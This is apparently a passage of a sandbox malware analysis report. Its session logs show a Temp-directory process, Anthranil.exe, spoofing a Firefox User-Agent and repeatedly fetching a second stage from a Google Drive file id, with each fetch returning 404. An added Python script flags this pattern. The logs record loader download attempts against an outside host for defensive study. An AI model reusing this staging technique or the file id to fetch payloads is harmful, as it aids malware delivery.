                                                                                  Connection: Keep-Alive
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:30:03 UTC  1851               IN         HTTP/1.1 404 Not Found
                                                                                  X-GUploader-UploadID: AFIdbgTJn2Lurzj4IBV0yd5RWlijRFGqBXIyYF-wU4Fi3JYtjhdHX7enYZGRNS05WM6MnzBQDJX8ZhI
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:30:03 GMT
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Content-Security-Policy: script-src 'nonce-jEN3criIUTNmSW7MN-8bvg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Content-Length: 1652
                                                                                  Server: UploadServer
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                                  Connection: close
                                                                                  2025-01-11 04:30:03 UTC  1652               IN         Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 33 51 58 4e 69 51 4f 53 2d 76 75 35 67 6d 64 6a 6a 63 31 4f 66 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="3QXNiQOS-vu5gmdjjc1Ofw">*{margin:0;padding:0}html,code{font:15px/22px arial
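
The four sessions above (24 through 27) show one exchange replayed every two to three seconds: the process running from the user's Temp directory, sending a Firefox User-Agent, asks drive.google.com for a file id, is redirected with 303 to drive.usercontent.google.com, and receives 404, so the hosted second stage was never delivered during this analysis. The following Python script is an added example and is not part of the Joe Sandbox report; it transcribes those exchanges into a small record list (the tuple layout is ours) and runs the checks an analyst would apply to proxy logs: group Drive fetches by process and file id, then flag a tight retry loop, a payload that is never served, a browser User-Agent sent by a non-browser image, and an image path under a drop directory. The list of browser images and the set of suspect directories are assumptions made for the example.

```python
import ntpath
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, Optional
from urllib.parse import parse_qs, urlsplit

# Exchanges transcribed from sessions 24-27 above: request timestamp, PID, process
# image, User-Agent, Host, request line, response status and Location header.
# The tuple layout is ours; the report presents each exchange as its own session.
UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
IMAGE = r"C:\Users\user\AppData\Local\Temp\Anthranil.exe"
FILE_ID = "1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-"
REDIRECT = f"https://drive.usercontent.google.com/download?id={FILE_ID}&export=download"
EXCHANGES = [
    ("2025-01-11 04:29:59", 6660, IMAGE, UA, "drive.google.com",
     f"GET /uc?export=download&id={FILE_ID} HTTP/1.1", 303, REDIRECT),
    ("2025-01-11 04:30:00", 6660, IMAGE, UA, "drive.usercontent.google.com",
     f"GET /download?id={FILE_ID}&export=download HTTP/1.1", 404, None),
    ("2025-01-11 04:30:01", 6660, IMAGE, UA, "drive.google.com",
     f"GET /uc?export=download&id={FILE_ID} HTTP/1.1", 303, REDIRECT),
    ("2025-01-11 04:30:02", 6660, IMAGE, UA, "drive.usercontent.google.com",
     f"GET /download?id={FILE_ID}&export=download HTTP/1.1", 404, None),
]

DRIVE_HOSTS = {"drive.google.com", "drive.usercontent.google.com"}
PAYLOAD_HOST = "drive.usercontent.google.com"
# Assumptions for this example: images a browser User-Agent may legitimately come
# from, and directories a loader typically drops into.
BROWSER_IMAGES = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}
SUSPECT_DIRS = ("\\appdata\\local\\temp\\", "\\users\\public\\", "\\programdata\\")


def file_id_from_query(query: str) -> Optional[str]:
    """Pull the Drive file id out of a query string such as 'export=download&id=...'."""
    ids = parse_qs(query).get("id")
    return ids[0] if ids else None


def drive_file_id(host: str, request_line: str) -> Optional[str]:
    """Return the Drive file id named by a request line, or None if not a Drive fetch."""
    if host not in DRIVE_HOSTS:
        return None
    parts = request_line.split(" ")
    if len(parts) < 2:
        return None
    return file_id_from_query(urlsplit(parts[1]).query)


def claims_browser(ua: str, image: str) -> bool:
    """True when the User-Agent names a browser but the sending image is not one."""
    browser_ua = any(tok in ua for tok in ("Firefox/", "Chrome/", "Safari/", "Edg/"))
    return browser_ua and ntpath.basename(image).lower() not in BROWSER_IMAGES


def analyze(exchanges, window: timedelta = timedelta(seconds=60), min_fetches: int = 2) -> Dict:
    """Group Drive traffic by (pid, file id) and flag tight retry loops against a missing payload."""
    groups = defaultdict(list)
    for ts, pid, image, ua, host, request_line, status, location in exchanges:
        fid = drive_file_id(host, request_line)
        if fid is None and location:
            # a 303 to the usercontent host is attributed to the same file id
            loc = urlsplit(location)
            if loc.hostname in DRIVE_HOSTS:
                fid = file_id_from_query(loc.query)
        if fid:
            when = datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")
            groups[(pid, fid)].append((when, image, ua, host, status))

    findings = {}
    for key, rows in groups.items():
        rows.sort(key=lambda r: r[0])
        fetches = [r for r in rows if r[3] == PAYLOAD_HOST]   # hops that would carry the payload
        statuses = [r[4] for r in fetches]
        span = rows[-1][0] - rows[0][0]
        image, ua = rows[0][1], rows[0][2]
        reasons = []
        if len(fetches) >= min_fetches and span <= window:
            reasons.append(f"{len(fetches)} payload fetches within {int(span.total_seconds())}s")
        if statuses and all(s == 404 for s in statuses):
            reasons.append("payload never served: every fetch returned 404")
        if claims_browser(ua, image):
            reasons.append(f"browser User-Agent sent by non-browser image {ntpath.basename(image)}")
        if any(d in image.lower() for d in SUSPECT_DIRS):
            reasons.append("requesting image runs from a user-writable drop directory")
        findings[key] = {
            "fetches": len(fetches),
            "statuses": statuses,
            "span_s": int(span.total_seconds()),
            "flagged": bool(reasons),
            "reasons": reasons,
        }
    return findings


if __name__ == "__main__":
    for (pid, fid), f in analyze(EXCHANGES).items():
        print(f"pid {pid} file {fid}: flagged={f['flagged']}")
        for r in f["reasons"]:
            print("  -", r)
```

The 303 hop itself is ordinary Drive behaviour and is not a signal on its own; what distinguishes this trace is the combination of a non-browser image in Temp, a browser User-Agent, and a fetch loop that keeps hitting 404. The file id and the two Drive hosts remain usable as indicators even though the second stage was not obtained here.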


                                                                                  Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                                  28          192.168.2.4  49326        216.58.206.46    443               6660  C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  Timestamp                Bytes transferred  Direction  Data
                                                                                  2025-01-11 04:30:04 UTC  422                OUT        GET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Host: drive.google.com
                                                                                  Cache-Control: no-cache
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:30:04 UTC  1920               IN         HTTP/1.1 303 See Other
                                                                                  Content-Type: application/binary
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:30:04 GMT
                                                                                  Location: https://drive.usercontent.google.com/download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy: script-src 'nonce-EdnXOrREbmQYDhtdl6x_6w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Server: ESF
                                                                                  Content-Length: 0
                                                                                  X-XSS-Protection: 0
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


                                                                                  Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                                  29          192.168.2.4  49327        142.250.185.129  443               6660  C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  Timestamp                Bytes transferred  Direction  Data
                                                                                  2025-01-11 04:30:05 UTC  464                OUT        GET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Cache-Control: no-cache
                                                                                  Host: drive.usercontent.google.com
                                                                                  Connection: Keep-Alive
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:30:05 UTC  1844               IN         HTTP/1.1 404 Not Found
                                                                                  X-GUploader-UploadID: AFIdbgR2QAmeHHnKsM1SzUUdkRWxTj6Owy4_t9bfFzuMkuoe92I_zo3QVOCae77XNB2agFfF
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:30:05 GMT
                                                                                  Content-Security-Policy: script-src 'nonce-FMuHsHtv33afmVkPvPyEWg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Content-Length: 1652
                                                                                  Server: UploadServer
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                                  Connection: close
                                                                                  2025-01-11 04:30:05 UTC | 1652              | IN        | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="a-YvZXltTjcf3Q8-OJS96g">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                  Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                                                                  30         | 192.168.2.4 | 49328       | 216.58.206.46   | 443              | 6660 | C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  Timestamp               | Bytes transferred | Direction | Data
                                                                                  2025-01-11 04:30:06 UTC | 422               | OUT       | GET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Host: drive.google.com
                                                                                  Cache-Control: no-cache
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:30:06 UTC | 1920              | IN        | HTTP/1.1 303 See Other
                                                                                  Content-Type: application/binary
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:30:06 GMT
                                                                                  Location: https://drive.usercontent.google.com/download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy: script-src 'nonce-rdCnHD50L5VZiTfez4iJ-w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Server: ESF
                                                                                  Content-Length: 0
                                                                                  X-XSS-Protection: 0
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


                                                                                  Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                                                                  31         | 192.168.2.4 | 49329       | 142.250.185.129 | 443              | 6660 | C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  Timestamp               | Bytes transferred | Direction | Data
                                                                                  2025-01-11 04:30:07 UTC | 464               | OUT       | GET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Cache-Control: no-cache
                                                                                  Host: drive.usercontent.google.com
                                                                                  Connection: Keep-Alive
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:30:07 UTC | 1851              | IN        | HTTP/1.1 404 Not Found
                                                                                  X-GUploader-UploadID: AFiumC6Iy_Dwv3OzE1-NvGJHrgIpFtOHAhqeGkRprAyrX9rFMxK_EJDQJyXpKxJxFkllbbrs2uDINI4
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:30:07 GMT
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Content-Security-Policy: script-src 'nonce-yebyOCxsHm-fw_6IbCDaUQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Content-Length: 1652
                                                                                  Server: UploadServer
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                                  Connection: close
                                                                                  2025-01-11 04:30:07 UTC | 1652              | IN        | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ECKFfZveMyyOOKrv-3YxzQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                  Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                                                                  32         | 192.168.2.4 | 49330       | 216.58.206.46   | 443              | 6660 | C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  Timestamp               | Bytes transferred | Direction | Data
                                                                                  2025-01-11 04:30:08 UTC | 422               | OUT       | GET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Host: drive.google.com
                                                                                  Cache-Control: no-cache
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:30:08 UTC | 1920              | IN        | HTTP/1.1 303 See Other
                                                                                  Content-Type: application/binary
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:30:08 GMT
                                                                                  Location: https://drive.usercontent.google.com/download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  Content-Security-Policy: script-src 'nonce-e6mOhMOcYNl9NI6E9pJ9HA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Server: ESF
                                                                                  Content-Length: 0
                                                                                  X-XSS-Protection: 0
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


                                                                                  Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                                                                  33         | 192.168.2.4 | 49331       | 142.250.185.129 | 443              | 6660 | C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  Timestamp               | Bytes transferred | Direction | Data
                                                                                  2025-01-11 04:30:09 UTC | 464               | OUT       | GET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Cache-Control: no-cache
                                                                                  Host: drive.usercontent.google.com
                                                                                  Connection: Keep-Alive
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:30:09 UTC | 1844              | IN        | HTTP/1.1 404 Not Found
                                                                                  X-GUploader-UploadID: AFIdbgTkcsJonDknn8WKqD6Xw13NFJXQMMMaMddybhhs52LvAol18cfi-EJzIDTQs6Qpa_R3
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:30:09 GMT
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy: script-src 'nonce-IiGMfMYpvzdZ5uW2MfiawQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Content-Length: 1652
                                                                                  Server: UploadServer
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                                  Connection: close
